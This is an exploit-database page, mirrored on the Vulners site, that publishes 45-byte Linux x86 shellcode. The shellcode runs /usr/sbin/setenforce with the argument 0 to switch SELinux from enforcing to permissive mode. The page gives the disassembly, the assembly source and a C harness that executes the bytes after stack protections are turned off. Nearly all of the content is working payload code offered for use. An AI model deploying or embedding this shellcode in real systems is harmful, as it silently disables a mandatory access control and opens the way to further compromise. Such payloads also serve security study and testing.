Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)

🗓️ 20 Feb 2017 00:00:00Reported by Exploit-DBType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 46 Views

x86 SELinux change between permissive and enforcing mode

Code
# Title: x86 SELinux change between permissive and enforcing modes shellcode
# Date: 20-02-2017
# Author: Krzysztof Przybylski
# Platform: Lin_x86
# Tested on: CentOS 6.8 (i686)
# Shellcode Size: 45 bytes
# ID: SLAE - 871
/*

1. Description:

SELinux mode switcher. Permissive = "\x30"; Enforcing = "\x31"
gcc -fno-stack-protector -z execstack SELinux-mode.c -o SELinux-mode

2. Disassembly of section .text:

08048060 <_start>:
 8048060:	6a 0b                	push   0xb
 8048062:	58                   	pop    eax
 8048063:	31 d2                	xor    edx,edx
 8048065:	52                   	push   edx
 8048066:	6a 30                	push   0x30
 8048068:	89 e1                	mov    ecx,esp
 804806a:	52                   	push   edx
 804806b:	68 6f 72 63 65       	push   0x6563726f
 8048070:	68 74 65 6e 66       	push   0x666e6574
 8048075:	68 6e 2f 73 65       	push   0x65732f6e
 804807a:	68 2f 73 62 69       	push   0x6962732f
 804807f:	68 2f 75 73 72       	push   0x7273752f
 8048084:	89 e3                	mov    ebx,esp
 8048086:	52                   	push   edx
 8048087:	51                   	push   ecx
 8048088:	53                   	push   ebx
 8048089:	89 e1                	mov    ecx,esp
 804808b:	cd 80                	int    0x80

3. Code

global _start			
section .text
_start:
	push 0xb	
        pop eax
	xor edx, edx
	push edx
	push byte 0x30
	mov ecx, esp
	push edx
	push 0x6563726f
	push 0x666e6574
	push 0x65732f6e
	push 0x6962732f
	push 0x7273752f
	mov ebx, esp
	push edx
	push ecx
	push ebx
	mov ecx, esp
	int 0x80
*/

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x6a\x0b\x58\x31\xd2\x52\x6a"
"\x30"
"\x89\xe1\x52\x68\x6f\x72\x63\x65"
"\x68\x74\x65\x6e\x66\x68\x6e\x2f"
"\x73\x65\x68\x2f\x73\x62\x69\x68"
"\x2f\x75\x73\x72\x89\xe3\x52\x51"
"\x53\x89\xe1\xcd\x80";

main()
{
        printf("Shellcode Length:  %d\n", strlen(code));
        int (*ret)() = (int(*)())code;
        ret();
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Feb 2017 00:00Current
selinuxpermissive modeenforcing modeshellcodelinuxcentos 6.8security
46